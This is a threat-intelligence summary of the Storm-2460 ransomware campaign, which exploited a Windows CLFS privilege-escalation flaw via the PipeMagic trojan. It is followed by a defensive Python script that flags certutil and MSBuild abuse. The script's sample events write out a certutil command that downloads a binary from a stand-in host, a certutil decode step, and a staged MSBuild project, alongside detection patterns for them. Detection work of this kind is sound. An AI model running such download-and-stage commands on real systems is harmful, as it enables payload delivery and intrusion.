
Who: A threat actor tracked as Storm-2460 exploited a Windows zero-day (CVE-2025-29824) using the PipeMagic trojan to deploy ransomware. Victims include IT, real estate, financial, software, and retail sectors across the U.S., Venezuela, Spain, and Saudi Arabia.
What: The vulnerability, a privilege escalation flaw in Windows Common Log File System (CLFS), was used to gain SYSTEM privileges. Attackers delivered encrypted ransomware payloads via a malicious MSBuild file and certutil, leveraging compromised third-party sites.
Impact: Systems were compromised to steal credentials (via LSASS dump) and encrypt files with ransomware linked to the RansomEXX family. Windows 11 version 24H2 is not affected. Microsoft has patched the flaw and urges immediate updates.
Action Needed:
Apply April 2025 Patch Tuesday updates.
Monitor for PipeMagic and related activity.
Restrict certutil use and implement credential protection strategies.
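As an added example (not part of the original summary or any vendor tooling), a small Python triage over constructed process-creation records, shaped like Sysmon Event ID 1 fields, covering the two monitoring points above: certutil invoked with download/decode switches (and spawned by MSBuild), and MSBuild run against a project file staged in a user-writable directory. The sample paths, hostname and switch set are assumptions for illustration, not indicators from the incident.

```python
import re

# Constructed sample process-creation records in the shape of Sysmon Event ID 1 fields.
# Made-up inputs for the detection logic below, not telemetry from the incident.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://cdn.example.invalid/a.bin C:\Users\Public\a.bin",
     "ParentImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil /decode C:\Users\Public\a.txt C:\Users\Public\a.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -store My",  # routine certificate store query, should not fire
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\Users\bob\AppData\Local\Temp\stage.proj",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\src\app\app.csproj /t:Build",  # normal developer build
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe"},
]

# certutil switches that fetch remote content or turn text back into a binary; certutil accepts '-' or '/'.
CERTUTIL_ABUSE = re.compile(r"(?:^|\s)[-/](urlcache|decodehex|decode|encode)\b", re.I)
# Project files under staging locations a non-developer process can write to, rather than a source tree.
USER_WRITABLE = re.compile(r"\\(Users\\Public|AppData\\Local\\Temp|ProgramData|Windows\\Temp)\\", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def triage(event):
    """Return the list of reasons an event matches; an empty list means no finding."""
    image, parent = basename(event["Image"]), basename(event.get("ParentImage", ""))
    cmd = event["CommandLine"]
    reasons = []
    if image == "certutil.exe":
        m = CERTUTIL_ABUSE.search(cmd)
        if m:
            reasons.append(f"certutil {m.group(1).lower()} used for download/decode")
        if parent == "msbuild.exe":
            reasons.append("certutil spawned by MSBuild")
    if image == "msbuild.exe" and USER_WRITABLE.search(cmd):
        reasons.append("MSBuild project file in user-writable path")
    return reasons

def scan(events):
    """Index and reasons for every event that produced at least one finding."""
    return [(i, r) for i, e in enumerate(events) if (r := triage(e))]

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))
```

Feed real Sysmon or Security 4688 records into scan() with the same three fields to reuse the logic; tune USER_WRITABLE to your environment's build locations before alerting on it.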